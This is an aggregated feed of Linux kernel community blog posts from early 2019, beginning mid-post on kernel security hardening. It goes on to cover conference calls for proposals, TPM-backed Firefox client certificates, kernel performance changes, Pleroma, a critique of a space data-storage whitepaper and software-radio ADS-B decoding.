An area of active work in the kernel is the removal of all implicit fall-through in switch statements. While the C language has a statement to indicate the end of a switch case (“break“), it doesn’t have a statement to indicate that execution should fall through to the next case statement (just the lack of a “break” is used to indicate it should fall through — but this is not always the case), and such “implicit fall-through” may lead to bugs. Gustavo Silva has been the driving force behind fixing these since at least v4.14, with well over 300 patches on the topic alone (and over 20 missing break statements found and fixed as a result of the work). The goal is to be able to add -Wimplicit-fallthrough to the build so that the kernel will stay entirely free of this class of bug going forward. From roughly 2300 warnings, the kernel is now down to about 200. It’s also worth noting that with Stephen Rothwell’s help, this bug has been kept out of linux-next by him sending warning emails to any tree maintainers where a new instance is introduced (for example, here’s a bug introduced on Feb 20th and fixed on Feb 21st).

ongoing: refcount_t conversions
There also continues to be work converting reference counters from atomic_t to refcount_t so they can gain overflow protections. There have been 18 more conversions since v4.15 from Elena Reshetova, Trond Myklebust, Kirill Tkhai, Eric Biggers, and Björn Töpel. While there are more complex cases, the minimum goal is to reduce the Coccinelle warnings from scripts/coccinelle/api/atomic_as_refcounter.cocci to zero. As of v5.0, there are 131 warnings, with the bulk of the remaining areas in fs/ (49), drivers/ (41), and kernel/ (21).

userspace PAC, arm64
Mark Rutland and Kristina Martsenko enabled kernel support for ARMv8.3 PAC in userspace. As mentioned earlier about PAC, this will give userspace the ability to block a wide variety of function pointer overwrites by “signing” function pointers before storing them to memory. The kernel manages the keys (i.e. selects random keys and sets them up), but it’s up to userspace to detect and use the new CPU instructions. The “paca” and “pacg” flags will be visible in /proc/cpuinfo for CPUs that support it.

platform keyring
Nayna Jain introduced the trusted platform keyring, which cannot be updated by userspace. This can be used to verify platform or boot-time things like firmware, initramfs, or kexec kernel signatures, etc.

Edit: added userspace PAC and platform keyring, suggested by Alexander Popov
Edit: tried to clarify TBI vs PAC vs MTE

That’s it for now; please let me know if I missed anything. The v5.1 merge window is open, so off we go! :)

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

March 12, 2019 11:04 PM

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Refereed-Track Proposals

We are pleased to announce the Call for Refereed-Track talk proposals for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

Refereed track presentations are 50 minutes in length (which includes time for questions and discussion) and should focus on a specific aspect of the “plumbing” in the Linux system. Examples of Linux plumbing include core kernel subsystems, toolchains, container runtimes, core libraries, windowing systems, management tools, device support, media creation/playback, and so on. The best presentations are not about finished work, but rather problems, proposals, or proof-of-concept solutions that require face-to-face discussions and debate.

For more information on submitting a Refereed-Track talk proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as 2018. If you created an user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

The call for Microconferences proposals is also open, and we hope to see you in Lisbon this coming September!

March 12, 2019 04:22 PM

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Microconference Proposals

We are pleased to announce the Call for Microconferences for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

A microconference is a collection of collaborative sessions focused on problems in a particular area of the Linux plumbing, which includes the kernel, libraries, utilities, services, UI, and so forth, but can also focus on cross-cutting concerns such as security, scaling, energy efficiency, toolchains, container runtimes, or a particular use case. Good microconferences result in solutions to these problems and concerns, while the best microconferences result in patches that implement those solutions. For more information on submitting a microconference proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as 2018. If you created an user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

Look for the upcoming call for refereed-track proposals, and we hope to see you in Lisbon this coming September!

March 12, 2019 12:07 AM

March 07, 2019

Michael Kerrisk (manpages): man-pages-5.00 is released

I've released man-pages-5.00. The release tarball is available on kernel.org. The browsable online pages can be found on man7.org. The Git repository for man-pages is available on kernel.org.

This release resulted from patches, bug reports, reviews, and comments from around 130 contributors. The release is rather larger than average, since it has been nearly a year since the last release. The release includes more than 600 commits that changed nearly 400 pages. In addition, 3 new manual pages were added.

Among the more significant changes in man-pages-5.,00 are the following:

In addition, two pages have been removed in this release after encouragement from Ingo Schwarze: mdoc(7) and mdoc.samples(7). As the commit message notes, groff_mdoc(7) from the groff project provides a better equivalent of mdoc.samples(7) and the mandoc project provides a better mdoc(7). And nowadays, there are virtually no pages in man-pages that use mdoc markup.

Again special thanks to Eugene Syromyatnikov, who contributed nearly 30 patches to this release!

March 07, 2019 04:57 AM

March 06, 2019

James Bottomley: Using TPM Based Client Certificates on Firefox and Apache

One of the useful features of Apache (or indeed any competent web server) is the ability to use client side certificates. All this means is that a certificate from each end of the TLS transaction is verified: the browser verifies the website certificate, but the website requires the client also to present one and verifies it. Using client certificates, when linked to your own client certificate CA gives web transactions the strength of two factor authentication if you do it on the login page. I use this feature quite a lot for all the admin features my own website does. With apache it’s really simple to turn on with the

SSLCACertificateFile

Directive which allows you to specify the CA for the accepted certificates. In my own setup I have my own self signed certificate as CA and then all the authority certificates use it as the issuer. You can turn Client Certificate verification on per location basis simply by doing

<Location /some/web/location>
SSLVerifyClient require
</Location

And Apache will take care of requesting the client certificate and verifying it against the CA. The only caveat here is that TLSv1.3 currently fails to work for this, so you have to disable it with

SSLProtocol -TLSv1.3

Client Certificates in Firefox

Firefox is somewhat hard to handle for SSL because it includes its own hand written mozilla secure sockets code, which has a toolkit quite unlike any other ssl toolkit1. In order to import a client certificate and key into firefox, you need to create a pkcs12 file containing them and import that into the “Your Certificates” box which is under Preferences > Privacy & Security > View Certificates

Obviously, simply supplying a key file to firefox presents security issues because you’d like to prevent a clever hacker from gaining access to it and thus running off with your client certificate. Firefox achieves a modicum of security by doing all key operations over the PKCS#11 API via a software token, which should mean that even malicious javascript cannot gain access to your key but merely the signing API

However, assuming you don’t quite trust this software separation, you need to store your client signing key in a secure vault like a TPM to make sure no web hacker can gain access to it. Various crypto system connectors, like the OpenSSL TPM2 and TPM2 engine, already exist but because Firefox uses its own crytographic code it can’t take advantage of them. In fact, the only external object the Firefox crypto code can use is a PKCS#11 module.

Aside about TPM2 and PKCS#11

The design of PKCS#11 is that it is a loadable library which can find and enumerate keys and certificates in some type of hardware device like a USB Key or a PCI attached HSM. However, since the connector is simply a library, nothing requires it connect to something physical and the OpenDNSSEC project actually produces a purely software based cryptographic token. In theory, then, it should be easy

The problems come with the PKCS#11 expectation of key residency: The library allows the consuming program to enumerate a list of slots each of which may, or may not, be occupied by a single token. Each token may contain one or more keys and certificates. Now the TPM does have a concept of a key resident in NV memory, which is directly analagous to the PKCS#11 concept of a token based key. The problems start with the TPM2 PC Client Profile which recommends this NV area be about 512 bytes, which is big enough for all of one key and thus not very scalable. In fact, the imagined use case of the TPM is with volatile keys which are demand loaded.

Demand loaded keys map very nicely to the OpenSSL idea of a key file, which is why OpenSSL TPM engines are very easy to understand and use, but they don’t map at all into the concept of token resident keys. The closest interface PKCS#11 has for handling key files is the provisioning calls, but even there they’re designed for placing keys inside tokens and, once provisioned, the keys are expected to be non-volatile. Worse still, very few PKCS#11 module consumers actually do provisioning, they mostly leave it up to a separate binary they expect the token producer to supply.

Even if the demand loading problem could be solved, the PKCS#11 API requires quite a bit of additional information about keys, like ids, serial numbers and labels that aren’t present in the standard OpenSSL key files and have to be supplied somehow.

Solving the Key File to PKCS#11 Mismatch

The solution seems reasonably simple: build a standard PKCS#11 library that is driven by a known configuration file. This configuration file can map keys to slots, as required by PKCS#11, and also supply all the missing information. the C_Login() operation is expected to supply a passphrase (or PIN in PKCS#11 speak) so that would be the point at which the private key could be loaded.

One of the interesting features of the above is that, while it could be implemented for the TPM engine only, it can also be implemented as a generic OpenSSL key exporter to PKCS#11 that happens also to take engine keys. That would mean it would work for non-engine keys as well as any engine that exists for OpenSSL … a nice little win.

Building an OpenSSL PKCS#11 Key Exporter

A Token can be built from a very simple ini like configuration file, with the global section setting global properties, like manufacurer id and library description and each individual section being used to instantiate a slot containing one key. We can make the slot name, the id and the label the same if not overridden and use key file directives to load the public and private keys. The serial number seems best constructed from a hash of the public key parameters (again, if not overridden). In order to support engine keys, the token library needs to know which engine to invoke, so I added an engine keyword to tell it.

With that, the mechanics of making the token library work with any OpenSSL key are set, the only thing is to plumb in the PKCS#11 glue API. At this point, I should add that the goal is simply to get keys and tokens working, not to replicate a full featured PKCS#11 API, so you shouldn’t use this as something to test against for a reference implementation (the softhsm2 token is much better for that). However, it should be functional enough to use for storing keys in Firefox (as well as other things, see below).

The current reasonably full featured source code is here, with a reference build using the OpenSUSE Build Service here. I should add that some of the build failures are due to problems with p11-kit and others due to the way Debian gets the wrong engine path for libp11.

At Last: Getting TPM Keys working with Firefox

A final problem with Firefox is that there seems to be no way to import a certificate file for which the private key is located on a token. The only way Firefox seems to support this is if the token contains both the private key and the certificate. At least this is my own project, so some coding later, the token now supports certificates as well.

The next problem is more mundane: generating the certificate and key. Obviously, the safest key is one which has never left the TPM, which means the certificate request needs to be built from it. I chose a CSR type that also includes my name and my machine name for later easy discrimination (and revocation if I ever lose my laptop). This is the sequence of commands for my machine called jarvis.

create_tpm2_key -a key.tpm
openssl req -subj "/CN=James Bottomley/UID=jarivs/" -new -engine tpm2 -keyform engine -key key.tpm -nodes -out jarvis.csr
openssl x509 -in jarvis.csr -req -CA my-ca.crt -engine tpm2 -CAkeyform engine -CAkey my-ca.key -days 3650 -out jarvis.crt

As you can see from the above, the key is first created by the TPM, then that key is used to create a certificate request where the common name is my name and the UID is the machine name (this is just my convention, feel free to use your own) and then finally it’s signed by my own CA, which you’ll notice is also based on a TPM key. Once I have this, I’m free to create an ini file to export it as a token to Firefox

manufacturer id = Firefox Client Cert
library description = Cert for hansen partnership
[mozilla-key]
certificate = /home/jejb/jarvis.crt
private key = /home/jejb/key.tpm
engine = tpm2

All I now need to do is load the PKCS#11 shared object library into Firefox using Settings > Privacy & Security > Security Devices > Load and I have a TPM based client certificate ready for use.

Additional Uses

It turns out once you have a generic PKCS#11 exporter for engine keys, there’s no end of uses for them. One of the most convenient has been using TPM2 keys with gnutls. Although gnutls was quick to adopt TPM 1.2 based keys, it’s been much slower with TPM2 but because gnutls already has a PKCS#11 interface using the p11 kit URI format, you can easily build a config file of all the TPM2 keys you want it to use and simply use them by URI in gnutls.

Unfortunately, this has also lead to some problems, the biggest one being Firefox: Firefox assumes, once you load a PKCS#11 module library, that you want it to use every single key it can find, which is fine until it pops up 10 dialogue boxes each time you start it, one for each key password, particularly if there’s only one key you actually care about it using. This problem doesn’t seem solvable in the Firefox token interface, so the eventual way I did it was to add the ability to specify the config file in the environment (variable OPENSSL_PKCS11_CONF) and modify my xfce Firefox action to set this in the environment pointing at a special configuration file with only Firefox’s key in it.

Conclusions and Future Work

Hopefully I’ve demonstrated this simple PKCS#11 converter can be useful both to keeping Firefox keys safe as well as uses in other things like gnutls. Unfortunately, it turns out that the world wide web is turning against PKCS#11 tokens as having usability problems and is moving on to something called FIDO2 tokens which have the web browser talking directly to the USB token. In my next technical post I hope to explain how you can use the Linux Kernel USB gadget system to connect a TPM up easily as a FIDO2 token so you can use the new passwordless webauthn protocol seamlessly.

March 06, 2019 08:21 PM

March 05, 2019

Paul E. Mc Kenney: Parallel Programming: March 2018 deferred-processing query

TL;DR: Do you know of additional publicly visible production uses of sequnce locking, hazard pointers, or RCU not already called out in the remainder of this blog post?

I am updating the deferred-processing chapter of “Is Parallel Programming Hard, And, If So, What Can You Do About It?” and would like to include a list of publicly visible production uses of sequence locking, hazard pointers, and RCU. I suppose I could also include reference counting, but given that it was well known before I was born, I expect that its list would be way too long to be useful!

The only production use of sequence locking that I am aware of is within the Linux kernel, but I would be surprised if it is not rather widely used. Can you tell me of more publicly visible production sequence-locking uses?

Hazard pointers is used within MongoDB (v3.0 and later) and within Facebook's Folly library, which is used in production at Facebook and perhaps elsewhere as well. It is also implemented by several libraries called out on its Wikipedia page (Concurrent Building Blocks, Concurrency Kit, Atomic Ptr Plus, and libcds). Hazard pointers is also sometimes called “safe memory reclamation” (SMR). Any other production hazard-pointers uses?

RCU is used within the Linux kernel, the FreeBSD kernel, the OpenBSD kernel, Linux Trace Toolkit Next Generation (LTTng), QEMU, Knot DNS, Netsniff-ng, Sheepdog, GlusterFS, and gdnsd. It is also implemented by several libraries, including Userspace RCU, Concurrency Kit, Facebook's Folly library, and libcds. RCU is also called “epochs” (from Keir Fraser), “generations” (from Tornado/K42), “passive serialization” (from IBM zVM), and probably other things as well. Any other production RCU uses?

So what do I mean by “publicly visible”? Open-source projects should qualify, as should scholarly publications regarding proprietary projects. Similarly, “production use” means use for getting some job done, as opposed to research, prototyping, or benchmarking. Not that there is necessarily anything wrong with research, prototyping, or benchmarking, but we are looking for things a little bit further along the hype cycle. ;-)

March 05, 2019 06:45 PM

February 28, 2019

Pete Zaitcev: Suddenly RISC-V

I knew about that thing because Rich Jones was a fan. Man, that guy is always ahead of the curve.

Coincidentially, a couple of days ago Amazon announced support for RISC-V in FreeRTOS (I have no idea how free that thig is. It's MIT license, but with Amazon, it might be patented up the gills.).

February 28, 2019 07:51 PM

Pete Zaitcev: Mu accounts

Okay, here's the breakdown:

@pro: Programming, computers, networking, maybe some technical fields. It's basically migrated from SeaLion and is the main account of interest for the readers of this journal.

@stuff: Pictures of butterflies, gardening, and general banality.

@gat: Boomsticks.

@avia: Flying.

@union: Politics.

@anime: Anime, manga, and weaboo. Note that Ani-nouto is still officially at Smug.

Thinking about adding @cars and @space, if needed.

You can subscribe from any Fediverse instance, just hit the "Remote follow" button.

February 28, 2019 05:06 PM

Pete Zaitcev: Multi-petabyte Swift cluster

In a Swift numbers post in 2017, I mentioned that the largest known cluster had about 20 PB. It is 2019 now and I just got a word that TurkCell is operating a cluster with 36 PB, and they are looking at growing it up to 50 PB by the end of the year. The information about its make-up is proprietary, unfortunately. The cluster was started in Icehouse release, so I'm sure there was a lot of churn and legacy, like 250 GB drives and RHEL 6.

February 28, 2019 04:44 PM

February 26, 2019

Linux Plumbers Conference: Welcome to the 2019 Linux Plumbers Conference blog

Planning for the 2019 Linux Plumbers Conference is well underway. The planning committee will be posting various informational blurbs here, including information on hotels, microconference acceptance, evening events, scheduling, and so on. Next up will be a “call for proposals” that should appear soon.

LPC will be held at the Corinthia Hotel, Lisbon, Portugal, 9-11 September 2019, colocated with the Linux Kernel Maintainer Summit. The Linux Kernel Summit Track will very much be taking place during LPC 2019 again this year.

February 26, 2019 02:21 PM

February 25, 2019

Pete Zaitcev: Elixir of your every fear

TFW you consider an O'Reily animal-cover book and the blurb says:

Authors Simon St. Laurent and J. David Eisenberg show you how Elixir combines the robust functional programming of Erlang with an approach that looks more like Ruby, and includes powerful macro features for metaprogramming.

February 25, 2019 01:34 AM

February 24, 2019

Davidlohr Bueso: Linux v4.20: Performance Goodies

With v4.20 out for almost the entire v5.0 rc-cycle, here are some of the more interesting performance related changes that made their way in.

signal: Use a smaller struct siginfo in the kernel

Reduces the memory footprint of 'struct siginfo' most of which is just reserved. Ultimately this avoid spanning two cachelines to just one.
[Commit 4ce5f9c9e754]

sched/fair: Fix cpu_util_wake() for 'execl' type workloads

Fix an exec() related performance regression, which was caused by incorrectly calculating load and migrating tasks on exec() when they shouldn't be.
[Commit c469933e7721]

locking/rwsem: Exit read lock slowpath if queue empty and no writer

This change presents a new heuristic for optimizing rw-semaphores, specifically in read-mostly scenarios. Before the patch, a reader could find itself in a situation when it was in the slowpath, due to an occasional writer thread, but the writer was then released, and only other readers are now present.  At that point the waitqueue was enlarged unnecessarily, causing other readers attempting to lock to see waiting readers. This directly improves some issues found when (ab)using pread64() and XFS.
[Commit 4b486b535c33]

mm: mmap: zap pages with read mmap_sem in munmap

When a process unmaps a range of memory, the infamous mmap_sem would held for the duration of the entire munmap() call, which can be a long time for big mappings (reportedly up to 18 seconds for a 320Gb mapping).  A two-phase approach was done to address this where the key is to unmap the vma first such that the semaphore can be taken exclusively at first then downgrade it such that it can be shared while doing the zapping and freeing of page tables.
[Commit dd2283f2605e b4cefb360512 cb4922496ae4]

net/tcp: optimize tcp internal pacing

When TCP implements its own pacing (when no fq packet scheduler is used), it is arming high resolution timer after a packet is sent. But in many cases (like TCP_RR kind of workloads), this high resolution timer expires before the application attempts to write the following packet. Setup the timer only when a packet is about to be sent, and if tcp_wstamp_ns is in the future,  showing a ~10% performance increase in TCP_RR workloads.
[Commit 864e5c090749]
 

fs: better member layout of struct super_block

Re-organize 'struct super_block' to try and keep some frequently accessed fields on the same cache line as well as grouping the rarely accessed members. This was seen to address a regression on a concurrent unlink intensive workload.
[Commit 99c228a994ec]


fs/fuse: improved scalability

Two changes that have performance visible effects went in. The first series changes some of the protections for background requests. This allows async reads not take the fuseconn lock. Secondly implement a hash table for processing requests which was seen to address a 20% time spent in request_find() under some workloads with Virtuozzo storage over rdma.
[Commit e287179afe21 2a23f2b8adbe 2b30a533148a ae2dffa39485 63825b4e1da5 c59fd85e4fd0 be2ff42c5d6e]

February 24, 2019 11:53 PM

February 22, 2019

Pete Zaitcev: Mu!

In the past several days, I innaugurated a private Fediverse instance, "Mu", running Pleroma for now. Although Mastodon is the dominant implementation, Pleroma is far easier to install, and uses less memory on small, private instances. By doing this, I'm bucking the trend of people hating to run their own infrastructure. Well, I do run my own e-mail service, so, what the heck, might as well join the Fediverse.

So far, it was pretty fun, but Pleroma has problem spots. For example, Pleroma has a concept of "local accounts" and "remote accounts": local ones are normal, into which users log in at the instance, and remote ones mirror accounts on other instances. This way, if users Alice@Mu and Bob@Mu follow user zaitcev@SLC, Mu creates a "remote" account UnIqUeStRiNg@Mu, which tracks zaitcev@SLC, so Alice and Bob subscribe to it locally. This permits to send zaitcev's updates over the network only once. Makes sense, right? Well... I have a "stuck" remote account now at Mu, let's call it Xprime@Mu and posit that it follows X@SPC. Updates posted by X@SPC are reflected in Xprime@Mu, but if Alice@Mu tries to follow X@SPC, she does not see updates that Xprime@Mu receives (the updates are not reflected in Alice's friends/main timeline) [1]. I asked at #pleroma about it, but all they could suggest was to try and resubscribe. I think I need to unsubscribe and purge Xprime@Mu somehow. Then, when Alice resubscribes, Pleroma will re-create a remote, say Xbis@Mu, and things hopefully ought to work. Well, maybe. I need to examine the source to be sure.

Unfortnately, aside from being somewhat complex by its nature, Pleroma is written in Elixir, which is to Erlang what Kotlin is to Java, I gather. Lain explains it thus:

As I had written a social network in Ruby for my work at around that time, I wanted to apply my [negative] experience to a new project. [...] This was also to get some experience with Elixir and the Erlang ecosystem, which seemed like a great fit for a fediverse server — and I think it is.

and to re-iterate:

When I started writing Pleroma I was already writing a social network in Ruby for my day job. Because of that, I knew a lot about the pain points of doing it with Ruby, mostly the bad performance for anything involving concurrency. I had written a Bittorrent DHT client in Elixir, so I knew that it would work well for this kind of software. I was also happy to work with functional programming again, which I like very much.

Anyway, it's all water under the bridge, and if I want to understand why Xprime@Mu is stuck, I need to learn Elixir. Early signs are not that good. Right away, it uses its own control entity that replaces make(1), packaging, and a few other things, called "mix". Sasuga desu, as they say in my weeb neighbourhood. Every goddamn language does that nowadays.


[1] It's trickier, actually. For an inexplicable reason, Alice sees some updates by X: for example, re-posts.

February 22, 2019 09:14 PM

Pavel Machek: Certified danger

I suspected Linux Foundation went to the dark side when they started strange deals with Microsoft. But I'm pretty sure they went to dark side now. https://venturebeat.com/2019/02/21/linux-foundation-elisa/ If Linux can be certified for safety-critical stuff, it means your certification requirements are _way_ too low. People are using microkernels for critical stuff for a reason...

February 22, 2019 01:38 PM

February 11, 2019

Pete Zaitcev: Feynman on discussions among great men

One of the first experiences I had in this project at Princeton was meeting great men. I had never met very many great men before. But there was an evaluation committee that had to try to help us along, and help us ultimately decide which way we were going to separate the uranium. This committee had men like Compton and Tolman and Smyth and Urey and Rabi and Oppenheimer on it. I would sit in because I understood the theory of how our process of separating isotopes worked, and so they'd ask me questions and talk about it. In these discussions one man would make a point. Then Compton, for example, would explain a different point of view. He would say it should be this way, and was perfectly right. Another guy would say, well, maybe, but there's this other possibility we have to consider against it.

So everybody is disagreeing, all around the table. I am surprised and disturbed that Compton doesn't repeat and emphasize his point. Finally, at the end, Tolman, who's the chairman, would say, ``Well, having heard all these arguments, I guess it's true that Compton's argument is the best of all, and now we have to go ahead.''

It was such a shock to me to see that a committee of men could present a whole lot of ideas, each one thinking of a new facet, while remembering what the other fella said, so that, at the end, the discussion is made as to which idea was the best — summing it all up — without having to say it three times. These were very great men indeed.

Life on l-k before CoC.

February 11, 2019 07:52 PM

February 06, 2019

Pete Zaitcev: SpaceBelt whitepaper

I pay a special attention to my hometown rocket enterprise, Firefly. So, it didn't escape my notice when Dr. Tom Markusic mentioned SunBelt in the SatMagazine as a potential user of launch services:

Cloud Constellation Corporation capped off 2018 funding announcements with a $100 million capital raise for space-based data centers [...]

Not a large amount of funding, but nonetheless, what are they trying to do? The official answer is provided in the whitepaper on their website.

The orbiting belt provides a greater level of security, independence from jurisdictional control, and eliminating the need for terrestrial hops for a truly worldwide network. Access to the global network is via direct satellite links, providing for a level of flexibility and security unheard of in terrestrial networks.

SpaceBelt provides a solution – a space-based storage layer for highly sensitive data providing isolation from conventional internet networks, extreme physical isolation, and sovereign independent data storage resources.

Although not pictured in the illustrations, text permits users direct access, which will become important later:

Clients can purchase or lease specialized very-small-aperture terminals (VSATs) which have customized SpaceBelt transceivers allowing highly-secure access to the network.

Interesting. But a few thoughts spring to mind.

Isolation from the Internet is vulnerable to the usual gateway problem, unintentional or malicious. If only application-level access is provided, a compromised gateway only accesses its own account. So that's fine. However, if state security services were able to insert malware into Iran's nuclear facilities, I think that the isolation may not be as impregnable as purported.

Consider also that system control has to be provided somehow, so they must have a control facility. In terms of vulnerabilities to governments and physical attacks, it is an equivalent of a datacenter hosting the intercontinental cluster's control plane, located at the point where master ground station is. In case of SpaceBelt, it is identified as "Network Management Center".

In addition, the space location invites a new spectrum of physical attacks: now the adversary can cook your data with microwaves or lasers, instead of launching ICBMs. It's a significantly lower barrier to the entry.

Turning around, it might be cheaper to store the data where the NMC is, since the physical security measures are the same, but vulnerabilities are smaller.

Of course the physical security includes a legal aspect. The whitepaper nods to "jurisdictional independence" several times. They don't explain what they mean, but they may be trying to imply that the data sent from the ground to the SpaceBelt does not traverse the ground infrastructure where NMC is located, and therefore is not a subject to any legal restrictions there, such as GDPR.

Very nice, and IANAL, but doesn't Outer Space Treaty establishes a regime of the absolute responsibility of signatory nations? I only know that OST is quite unlike the Law of The Sea: because of the absolute responsibility there is no salvage. Therefore, a case can be made, if the responsible nation is under GDPR, the whole SunBelt is too.

The above considerations apply to the "sovereign" or national data, but the international business faces more. The whitepaper implies that accessing data may be a simple matter of "leasing VSATs", but the governments still have the powers to deny this access. Usually the radio frequency licensing is involved, such as the case of OneWeb in Russia. The whitepaper mentions using traditional GSO comsats as relays, thus shifting the radio spectrum licensing hurdles onto the comsat operators. But there may be outright bans as well. I'm sure the Communist government of mainland China will not be happy if SunBelt users start downloading Falun Gong literature from space.

One other thing. If frying SpaceBelt with lasers might be too hard, there are other ways. Russia, for example, is experimenting with a rogue satellite that approaches comsats. It's not doing anything too bad to them at present, but so much for the "extreme physical isolation". If you thought that using SunBelt VSAT will isolate you from the risk of Russian submarines tapping undersea cables, then you might want to reconsider.

Overall, it's not like I would not love to work at Cloud Constellation Corporation, implementing the basic technologies their project needs. Sooner or later, humanity will have computing in space, might as well do it now. But their pitch needs work.

Finally, for your amusement:

In the future, the SpaceBelt system will be enabled to host docker containers allowing for on-orbit data processing in-situ with data storage.

Congratulations, Docker. You've became the xerox of cloud. (In the U.S., Xerox was ultimately successful is fighting the dillution: everyone now uses the word "photocopy". Not that litigation helped them to remain relevant.)

February 06, 2019 08:50 PM

January 29, 2019

Paul E. Mc Kenney: Article review: "The Hard Truth About Innovative Cultures"

There has been much ink spilled about innovation over the past decades, but this article from Harvard Business Review is the first one that really rings true with my experiences. The main point of this article is that much prior writing has focused on the fun aspects of innovation, and points out some additional hard work that is absolutely required for meaningful innovation. The authors put forth five maxims, each of which is discussed below.

Tolerance for failure but no tolerance for incompetence. This maxim is the one that rings most true with me: Innovation's progress is often measured in errors per hour, but the errors have to be productive errors that either eliminate classes of potential solutions from consideration or that better approximate a useful solution. And in my experience, extreme competence is required to make the right mistakes, that is, the mistakes that will generate the experience required to eventually arrive at a workable solution.

However, this maxim is also the one that I am most uncomfortable with. The discomfort stems from the choice of the word “incompetence”. After all, what is incompetence? The old apprentice/journeyman/master trichotomy is a useful guide. An apprentice is expected to do useful work if overseen by a journeyman or master. A journeyman is expected to be capable of carrying out a wide range of tasks without guidance. A master is expected to be able to extend the state of the art as needed to complete the task at hand. Clearly, there is a wide gulf between the definition of “incompetence” appropriate for an apprentice on the one hand and a master on the other. The level of competence required for this sort of work is not a function of education, certifications, or seniority, but instead requires a wide range of deep skills and experience combined with a willingness to learn things the hard way, along with a tolerance for the confusion and disorder that usually accompanies innovation. In short, successful innovation requires the team have a fair complement of masters. Yet it makes absolutely no sense to label as “incompetent” an accomplished journeyman, even if said journeyman is a bit uncreative and disorder-intolerant.

All that aside, “Tolerance for failure but no tolerance for non-mastery” doesn't exactly roll off the tongue, and besides which, large projects would have ample room for apprentices and journeymen, for example, our hypothetical accomplished but disorder-intolerant journeyman might be an excellent source of feedback. And in fact, master-only teams tend to be quite small [PDF, paywalled, sorry!]. I therefore have no suggestions for improvement. And wording quibbles aside, this maxim seems to me to be the most important of the five by far.

Willingness to experiment but highly disciplined. Although it is true that sometimes the only way forward is a random walk, it is still critically important to keep careful records of the experiments and their outcomes. It is often the case that last week's complete and utter failure turns out to contain the seeds of this week's step towards success, and sometimes patterns within a depressing morass of failures point the way to eventual success. The article also makes the excellent point that stress-testing ideas early on avoids over-investing in the inevitable blind alleys.

Psychologically safe but brutally candid. We all fall in love with our ideas, and therefore we all need the occasional round of “frank and open” feedback. If nothing else, we should design our experiments (or, in software, our validation suites) to provide that feedback.

Collaboration but with individual accountability. Innovation often requires that individuals and teams buck the common wisdom, but common wisdom often carries the day. Therefore, those individuals and teams must remain open to feedback, and accountability is one good way to help them seek out feedback and take that feedback seriously.

Flat but strong leadership. Most of my innovation has been carried out by very small teams, so this maxim has not been an issue for me. But people wishing to create large but highly innovative teams would do well to read this part of the article very carefully.

In short, this is a great article, and to the best of my knowledge the first one presenting both the fun and hard-work sides of the process of innovation. Highly recommended!

January 29, 2019 06:43 PM

James Morris: Save the Dates! Linux Security Summit Events for 2019.

There will be two Linux Security Summit (LSS) events again this year:

Stay tuned for CFP announcements!

January 29, 2019 05:35 PM

January 06, 2019

Pete Zaitcev: Reinventing a radio wheel

I tinker with software radio as a hobby and I am stuck solving a very basic problem. But first, a background exposition.

Bdale, what have you done to me

Many years ago, I attended an introductory lecture on software radio at a Linux conference we used to have - maybe OLS, maybe LCA, maybe ALS/Usenix even. Bdale Garbee was presenting, who I mostly knew as a Debian guy. He outlined a vision of Software Defined Radio: take what used to be a hardware problem, re-frame it as a software problem, let hackers hack on it.

Back then, people literally had sound cards as receiver back-ends, so all Bdale and his cohorts could do was HF, narrow band signals. Still, the idea seemed very powerful to me and caught my imagination.

A few years ago, the RTL-SDR appeared. I wanted to play with it, but nothing worthy came to mind, until I started flying and thus looking into various aviation data link signals, in particular ADS-B and its relatives TIS and FIS.

Silly government, were feet and miles not enough for you

At the time FAA became serious about ADS-B, two data link standards were available: Extended Squitter aka 1090ES at 1090 MHz and Universal Access Transciever aka UAT at 978 MHz. The rest of the world was converging quickly onto 1090ES, while UAT had a much higher data rate, so permitted e.g. transmission of weather information. FAA sat like a Buridan's ass in front of two heaps of hay, and decided to adopt both 1090ES and UAT.

Now, if airplane A is equipped with 1090ES and airplane B is equipped with UAT, they can't communicate. No problem, said FAA, we'll install thousands of ground stations that re-transmit the signals between bands. Also, we'll transmit weather images and data on UAT. Result is, UAT has a lot of signals all the time, which I can receive.

Before I invent a wheel, I invent an airplane

Well, I could, if I had a receiver that could decode a 1 megabit/second signal. Unfortunately, RTL-SDR could only snap 2.8 million I/Q samples/second in theory. In practice, even less. So, I ordered an expensive receiver called AirSpy, which was told to capture 20 million samples/second.

But, I was too impatient to wait for my AirSpy, so I started thinking if I could somehow receive UAT with RTL-SDR, and I came up with a solution. I let it clock at twice of the exact speed of UAT, a little more than 1 mbit/s. Then, since UAT used PSK2 encoding, I would compare phase angles between samples. Now, you cannot know for sure where the bits fall over your samples. But you can look at decoded bits and see if it's garbage or a packet. Voila, making impossible possible, at Shannon's boundary.

When I posted my code to github, it turned out that a British gentleman by the handle of mutability was thinking about the same thing. He contributed a patch or two, but he also had his own codebase, at which I hacked a bit too. His code was performing better, and it found a wide adoption under the name dump978.

Meanwhile, the AirSpy problem

AirSpy ended collecting dust, until now. I started playing with it recently, and used the 1090ES signal for tests. It was supposed to be easy... Unlike the phase shift of UAT, 1090ES is much simpler signal: raising front is 1, falling front is 0, stable is invalid and is used in the preamble. How hard can it be, right? Even when I found that AirSpy only receives the real component, it seemed immaterial: 1090ES is not phase-encoded.

But boy, was I wrong. To begin with, I need to hunt a preamble, which synchronizes the clocks for the remainder of the packet. Here's what it looks like:

The fat green square line on the top is a sample that I stole from our German friends. The thin green line is a 3-sample average of abs(sample). And the purple is raw samples off the AirSpy, real-only.

My first idea was to compute a "discriminant" function, or a kind of an integrated difference between the ideal function (in fat green) and the actual signal. If the discriminant is smaller than a threshold, we have our preamble. The idea was a miserable failure. The problem is, the signal is noisy. So, even when the signal is normalized, the noise in more powerful signal inflates the discriminant enough that it becomes larger than the discriminant of background noise.

Mind, this is a long-solved problem. Software receiver for 1090ES with AirSpy exists. I'm just playing here. Still... How do real engineers do it?

January 06, 2019 03:47 AM

December 24, 2018

